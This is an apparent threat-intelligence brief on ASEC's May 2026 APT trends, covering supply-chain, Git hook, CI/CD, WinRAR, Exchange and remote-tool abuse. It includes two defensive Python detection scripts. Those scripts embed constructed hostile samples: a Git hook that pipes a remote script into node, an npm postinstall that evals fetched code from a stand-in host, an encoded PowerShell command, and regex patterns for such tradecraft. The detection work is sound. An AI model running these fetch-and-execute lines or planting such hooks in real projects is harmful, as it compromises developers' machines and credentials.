May 2026 APT Trends Highlight Developer Ecosystem and Runtime Exploitation as Key Attack Vectors

Answer Brief

ASEC’s May 2026 APT report identifies supply chain compromise, developer environment infiltration, and runtime abuse as the dominant trends: Lazarus planted Git hooks and abused CI/CD pipelines, Famous Chollima poisoned development branches of npm and Packagist packages, and MuddyWater used Microsoft Teams lures and Quick Assist for credential theft. Gamaredon (UAC-0010) exploited the WinRAR path traversal CVE-2025-8088 against Ukrainian entities, while the China-aligned Famous Sparrow group breached Azerbaijani energy firms by chaining long-patched Exchange vulnerabilities (ProxyShell and ProxyNotShell). Across government, defense, diplomacy, energy, education, and telecom targets the common objectives were credential and session theft, cryptocurrency wallet theft, and persistent remote access.

Why It Matters

ASEC’s May 2026 APT group trends report marks a clear evolution in adversary tactics, with supply chain compromise, developer environment infiltration, and runtime environment abuse emerging as central themes across multiple threat actors. The report emphasizes that attackers are no longer relying solely on traditional phishing or exploit chains but are instead embedding malicious code into trusted development workflows—such as Git hooks and CI/CD pipelines—to achieve stealthy, persistent access. This shift reflects a broader trend of living-off-the-land and abuse of legitimate infrastructure, where attackers leverage tools and services already present in target environments to evade detection. Notably, the abuse of developer ecosystems is not limited to a single actor but is observed across geographically and ideologically diverse groups, indicating a convergent evolution in TTPs driven by the increasing value of developer credentials, source code, and build systems as pivot points for wider network compromise.

Lazarus’s use of Git hooks and Jenkins CI/CD to deploy malware like InvisibleFerret and Beavertail represents a significant escalation in supply chain risk. By triggering malicious code execution on routine developer actions, such as committing code (pre-commit) or checking out a branch (post-checkout), Lazarus turns the development environment itself into an infection vector. Hooks are not versioned with the repository, so planting one requires either prior access to the workstation or a repository-side mechanism, such as core.hooksPath or a hook-manager dependency, that installs hooks from the checked-out tree; either way the hook then runs with the developer's privileges and credentials. The stolen cryptocurrency wallets and developer credentials can be used to sign malicious code, poison internal packages, or reach internal repositories, and a compromised CI/CD job can do the same with the build system's own secrets. The targeting of developer environments is particularly concerning given the trust placed in these systems and the potential for downstream impact when compromised code is integrated into production builds.

Technical Signal

Famous Chollima’s tactics further illustrate the sophistication of modern supply chain attacks. By compromising only development branches of legitimate npm and Packagist packages, rather than publishing malicious versions to the public registries, the group stays outside the view of registry-side integrity checks (published-version hashes, provenance attestations), which never see code that exists only on a branch a developer clones and builds locally. The use of Cloudflare Workers and blockchain RPC endpoints as dead drops for payload retrieval adds resilience and anonymity: the payload or its next-stage address can be updated without maintaining persistent C2 infrastructure that could be traced or blocked, and the traffic blends in with legitimate requests to widely used services. This method exemplifies how APTs are blending traditional malware delivery with decentralized and ephemeral infrastructure to enhance operational security.
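The two passages above describe two places where a developer environment can be turned against its owner: Git hooks that fire on routine actions, and lifecycle scripts on a package branch that never reaches the registry. The Python script below is an added example, written for this brief rather than taken from ASEC's report or from any of the named vendors, of the basic hygiene check a team can run over a checkout: it resolves the active hooks directory (honouring core.hooksPath), flags hooks whose content matches a set of heuristic indicators, and reports npm lifecycle scripts (preinstall, postinstall and the like) that differ between the main branch and a development branch. The indicator patterns, the throwaway demo repository and both package.json manifests are constructed for the example and are not indicators from the report.

```python
"""Developer-environment integrity check (added example, not from the ASEC report).
Flags Git hooks and package lifecycle scripts that match heuristic indicators
and diffs lifecycle scripts between two branch snapshots of package.json.
All indicator patterns below are assumptions for illustration, not report IOCs."""
import json
import re
import stat
import subprocess
import sys
import tempfile
from pathlib import Path

# Heuristic indicators (assumed): remote content piped into an interpreter,
# decoded payloads, inline interpreter execution, and hosts/calls of the kind
# used as dead drops (Cloudflare Workers subdomains, Ethereum JSON-RPC eth_call).
SUSPICIOUS = [
    (r"curl[^\n|]*\|\s*(sh|bash|node|python)", "remote script piped to interpreter"),
    (r"base64\s+(-d|--decode)", "base64-decoded payload"),
    (r"\bnode\s+-e\b", "inline node execution"),
    (r"powershell[^\n]*-enc", "encoded PowerShell"),
    (r"\beval\(", "eval of dynamic content"),
    (r"\.workers\.dev\b", "Cloudflare Workers host"),
    (r"\beth_call\b", "Ethereum JSON-RPC call (possible dead drop)"),
]
# npm lifecycle scripts that run automatically on install or prepare.
LIFECYCLE = {"preinstall", "install", "postinstall", "prepare", "prepublish"}


def classify(text):
    """Return the labels of every indicator pattern found in text."""
    return [label for pat, label in SUSPICIOUS if re.search(pat, text, re.IGNORECASE)]


def hooks_dir(repo):
    """Active hooks directory: core.hooksPath if set, else .git/hooks."""
    custom = ""
    try:
        r = subprocess.run(["git", "-C", str(repo), "config", "--get", "core.hooksPath"],
                           capture_output=True, text=True, check=False)
        custom = r.stdout.strip()
    except OSError:          # git not installed: fall back to the default location
        pass
    if custom:
        p = Path(custom).expanduser()
        return p if p.is_absolute() else Path(repo) / p
    return Path(repo) / ".git" / "hooks"


def scan_hooks(repo):
    """Hooks (excluding *.sample) whose content matches an indicator."""
    findings = []
    d = hooks_dir(repo)
    if not d.is_dir():
        return findings
    for f in sorted(d.iterdir()):
        if not f.is_file() or f.suffix == ".sample":
            continue
        labels = classify(f.read_text(errors="replace"))
        if labels:
            findings.append({"hook": f.name,
                             "executable": bool(f.stat().st_mode & stat.S_IXUSR),
                             "labels": labels})
    return findings


def scan_manifest(package_json_text):
    """Lifecycle scripts in a package.json and the indicators they match."""
    scripts = json.loads(package_json_text).get("scripts", {})
    return {name: classify(cmd) or ["lifecycle script present"]
            for name, cmd in scripts.items() if name in LIFECYCLE}


def diff_lifecycle(main_text, dev_text):
    """Lifecycle scripts added or changed on the dev branch relative to main."""
    main_s = json.loads(main_text).get("scripts", {})
    dev_s = json.loads(dev_text).get("scripts", {})
    return {k: v for k, v in dev_s.items() if k in LIFECYCLE and main_s.get(k) != v}


# Constructed manifests: a clean main branch and a dev branch with a hostile postinstall.
MAIN_MANIFEST = json.dumps({"name": "demo-pkg", "version": "1.0.0",
                            "scripts": {"test": "jest"}})
DEV_MANIFEST = json.dumps({"name": "demo-pkg", "version": "1.0.1-dev",
                           "scripts": {"test": "jest",
                                       "postinstall": "node -e \"eval(fetch('https://demo.workers.dev/p'))\""}})


def demo():
    """Build a constructed repository in a temp dir and run all three checks."""
    with tempfile.TemporaryDirectory() as tmp:
        hooks = Path(tmp) / ".git" / "hooks"
        hooks.mkdir(parents=True)
        hook = hooks / "post-checkout"          # fires on every branch checkout
        hook.write_text("#!/bin/sh\n# constructed sample, not a real artifact\n"
                        "curl -s https://example.invalid/stage1 | node\n")
        hook.chmod(hook.stat().st_mode | stat.S_IXUSR)
        (hooks / "pre-commit.sample").write_text("#!/bin/sh\nexit 0\n")
        return {"hooks": scan_hooks(tmp),
                "manifest": scan_manifest(DEV_MANIFEST),
                "branch_diff": diff_lifecycle(MAIN_MANIFEST, DEV_MANIFEST)}


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    print(json.dumps(scan_hooks(target) if target else demo(), indent=2))
```

Run it with a checkout path to scan a real repository, or with no arguments to see the constructed demo. The same lifecycle-script diff applies to Packagist packages by reading the `scripts` section of composer.json instead of package.json; the point in both cases is to review the branch a developer is about to build, not only the version the registry serves.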

The report also highlights the continued exploitation of n-day vulnerabilities in widely deployed software. Gamaredon’s abuse of CVE-2025-8088 in WinRAR against Ukrainian government and security entities shows how even a seemingly low-risk utility becomes a foothold: the flaw is a path traversal through NTFS alternate data streams in archive entries, so a crafted archive can write a file into the Startup folder during extraction, and the extraction step itself delivers persistence for GammaDrop and GammaLoad. Similarly, the China-aligned Famous Sparrow group’s chaining of the ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) and ProxyNotShell (CVE-2022-41040, CVE-2022-41082) Exchange vulnerabilities, all patched years before this campaign, to breach Azerbaijani oil and gas firms underscores the enduring risk of unpatched or delayed-patch environments in critical infrastructure sectors. The deployment of web shells, DLL side-loading, Deed RAT, and Terndoor for long-term access and lateral movement reflects a mature post-exploitation lifecycle focused on persistence and data collection.

Operational Impact

MuddyWater’s activities showcase a blended approach to social engineering and technical exploitation. By combining Microsoft Teams-based lures, Quick Assist phishing, and the abuse of legitimate remote tools like AnyDesk and DWAgent, the group effectively bypasses traditional email-centric defenses. The use of Game.exe RAT for data exfiltration, alongside DLL side-loading and Node.js/PowerShell chains for reconnaissance and privilege escalation, indicates a flexible, modular toolkit adapted to target environments. This mirrors broader trends in APT operations where legitimate remote management tools are repurposed for malicious use, reducing reliance on custom malware that might trigger antivirus or EDR alerts.
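The chain described above is visible in process-creation telemetry before any custom malware runs: a remote-assist or RMM binary appears, and an interpreter such as Node.js or PowerShell is launched underneath it. The Python below is an added example written for this brief, not code from ASEC's report or from any of the named tools, showing how such events can be triaged offline. The binary names, the rule logic and the sample events are assumptions and constructed data, not indicators from the report; in practice the events would come from Sysmon event ID 1 or an EDR's process-creation stream.

```python
"""Process-creation triage for remote-tool and interpreter-chain tradecraft.
Added example, not ASEC's or any vendor's code. Binary names, rules and the
sample events are assumptions / constructed data, not indicators from the report."""
import re

# Assumed: remote-assist and RMM binaries that are legitimate but worth a
# review alert whenever they appear, with the spawning process recorded.
RMM_BINARIES = {"anydesk.exe", "quickassist.exe", "dwagent.exe"}
# Assumed: interpreters that form reconnaissance / escalation chains.
INTERPRETERS = {"node.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Encoded-command switches as they appear in a PowerShell command line.
ENCODED = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.IGNORECASE)

# Constructed sample of process-creation events (Sysmon event ID 1 style fields).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\WindowsApps\MSTeams\ms-teams.exe", "cmdline": "ms-teams.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Program Files\WindowsApps\QuickAssist\QuickAssist.exe", "cmdline": "QuickAssist.exe"},
    {"pid": 400, "ppid": 100, "image": r"C:\Users\u\Downloads\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    {"pid": 500, "ppid": 400, "image": r"C:\Program Files\nodejs\node.exe", "cmdline": r"node.exe C:\Users\u\AppData\Local\Temp\r.js"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell.exe Get-Process"},
]


def base(image):
    """Lower-cased file name of an image path (handles both slash styles)."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def lineage(event, by_pid, limit=16):
    """The event followed by its ancestors, bounded so pid reuse cannot loop."""
    chain = [event]
    while len(chain) < limit:
        parent = by_pid.get(chain[-1]["ppid"])
        if parent is None or parent in chain:
            break
        chain.append(parent)
    return chain


def triage(events):
    """Return (rule, pid, detail) tuples for events matching the heuristics."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        img = base(e["image"])
        chain = lineage(e, by_pid)
        parent = base(chain[1]["image"]) if len(chain) > 1 else "unknown"
        cmd = f" {e.get('cmdline', '')} "
        # Any remote-assist / RMM launch is reviewed, with its parent recorded.
        if img in RMM_BINARIES:
            alerts.append(("rmm_launch", e["pid"], f"{parent} -> {img}"))
        # Encoded command lines hide the script body from simple logging.
        if img in SHELLS and ENCODED.search(cmd):
            alerts.append(("encoded_command", e["pid"], cmd.strip()))
        # Node.js spawning a shell is the recon / escalation hand-off in the chain.
        if img in SHELLS and parent == "node.exe":
            alerts.append(("node_to_shell", e["pid"], f"{parent} -> {img}"))
        # Any interpreter with an RMM tool somewhere in its ancestry.
        ancestors = [base(a["image"]) for a in chain[1:]]
        if img in INTERPRETERS and any(a in RMM_BINARIES for a in ancestors):
            alerts.append(("interpreter_under_rmm", e["pid"],
                           " -> ".join(reversed([img] + ancestors))))
    return alerts


def alerts_by_pid(alerts):
    """Group rule names by pid for a quick review table."""
    out = {}
    for rule, pid, _ in alerts:
        out.setdefault(pid, []).append(rule)
    return out


if __name__ == "__main__":
    for rule, pid, detail in triage(SAMPLE_EVENTS):
        print(f"{rule:22} pid={pid:<4} {detail}")
```

Alerting on every RMM launch is noisy where these tools are sanctioned; scope the rule to hosts or users where they are not, and keep the parent-process detail, since a remote-assist session started from a chat client is the interesting case. The lineage walk is what ties the pieces together: an encoded PowerShell command on its own is common, but one whose ancestry runs through node.exe and an RMM binary is the chain the report describes.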

Other notable trends include the abuse of generative AI platforms like Ideogram AI, ChatGPT, and Gemini for creating bait content and developing malware, as observed in GREYVIBE’s campaigns. This reflects a growing interest in leveraging AI to enhance the credibility of lures and accelerate malware development cycles. Similarly, groups like OceanLotus and Webworm are increasingly abusing legitimate cloud and collaboration platforms—such as Zulip REST API, Microsoft Graph API, GitHub, and compromised Amazon S3 buckets—for C2 and payload distribution, further blurring the line between malicious and benign traffic.

What To Watch

The geographic and sectoral targeting described in the report remains consistent with historical patterns: government, defense, diplomacy, energy, education, and telecom sectors are repeatedly targeted, often with overlapping objectives of intelligence gathering, credential harvesting, and access maintenance. The inclusion of cryptocurrency-related targets, particularly in Lazarus’s operations, highlights the financial motivation intertwined with traditional espionage goals. The report concludes that the convergence of supply chain attacks, developer environment compromise, runtime abuse, and legitimate tool misuse has made detection significantly more challenging, necessitating a shift toward behavior-based monitoring, developer environment hardening, and stricter controls on CI/CD pipelines and package integrity.

For global security teams, the May 2026 APT trends are a reminder that securing the software development lifecycle is a core component of cyber resilience rather than an optional extra. Organizations should inventory and monitor Git hooks (including repositories that set core.hooksPath), enforce strict controls on CI/CD pipelines and the credentials they hold, validate package integrity on development branches as well as on published versions, and alert on unexpected use of legitimate cloud services and remote management tools. The findings also reinforce the need for runtime protection and memory-based threat detection, and for continuous monitoring of the interpreters and runtimes (Node.js, PowerShell) that these abuse-based attack chains rely on.

Event Type: security
Importance: high

Affected Companies

  • Amazon S3
  • AnyDesk
  • Cloudflare
  • DWAgent
  • Discord
  • Dropbox
  • GitHub
  • GitLab
  • JetBrains
  • Microsoft
  • OneDrive
  • Packagist
  • Telegram
  • VSCode
  • Zoom
  • npm

Affected Sectors

  • Cloud Services
  • Cryptocurrency
  • Defense
  • Diplomacy
  • Education
  • Energy
  • Government
  • Software Development
  • Telecommunications

Timeline

  1. ASEC publishes May 2026 APT group trends report highlighting supply chain, developer environment, and runtime exploitation as key attack vectors.
  2. Lazarus observed using Git hooks and Jenkins CI/CD to infect development flows, deploying InvisibleFerret, Beavertail, and FCCCall to steal cryptocurrency wallets and developer credentials.
  3. Famous Chollima compromised npm and Packagist development branches, using Cloudflare Workers and blockchain RPC as dead drops for payload delivery.
  4. Gamaredon (UAC-0010) exploited WinRAR CVE-2025-8088 to target Ukrainian government, judiciary, and security entities, using NTFS ADS and Startup folder for persistent GammaDrop and GammaLoad installation.
  5. Famous Sparrow chained the long-patched ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) and ProxyNotShell (CVE-2022-41040, CVE-2022-41082) Exchange vulnerabilities to breach Azerbaijani oil and gas firms, deploying web shells, DLL side-loading, Deed RAT, and Terndoor for long-term access.
  6. MuddyWater combined Microsoft Teams social engineering, Quick Assist phishing, AnyDesk, DWAgent, and Game.exe RAT for data theft and exfiltration, alongside DLL side-loading and Node.js/PowerShell chains for reconnaissance and credential theft.

Frequently Asked Questions

What attack trends does ASEC’s May 2026 APT report identify as dominant?

The report identifies supply chain attacks, developer environment compromise, and runtime abuse as dominant trends. APT groups are increasingly infecting Git hooks, CI/CD pipelines, and legitimate update mechanisms to establish persistence and steal credentials, cryptocurrency wallets, and session data.

How is Lazarus exploiting developer environments in May 2026 according to ASEC?

Lazarus abused Git hooks (pre-commit, post-checkout) and Jenkins CI/CD pipelines to inject malware like InvisibleFerret, Beavertail, and FCCCall into development flows, targeting cryptocurrency wallets and developer credentials for theft.

Which vulnerability did Gamaredon (UAC-0010) exploit in May 2026, and against whom?

Gamaredon (UAC-0010) exploited the WinRAR vulnerability CVE-2025-8088 to target Ukrainian government, judiciary, and security institutions, using NTFS ADS and the Startup folder to automatically install GammaDrop and GammaLoad malware.

How did Famous Chollima use blockchain infrastructure in its May 2026 attacks?

Famous Chollima used blockchain RPC infrastructure as a dead drop to deliver payloads while poisoning npm and Packagist development branches, enabling stealthy payload retrieval without direct C2 communication.

What common objectives did APT groups share across sectors in May 2026?

Credential theft, cryptocurrency wallet and session data exfiltration, browser data harvesting, and persistent remote access were consistent objectives across government, defense, diplomacy, energy, education, and telecom sectors targeted by APT groups in May 2026.
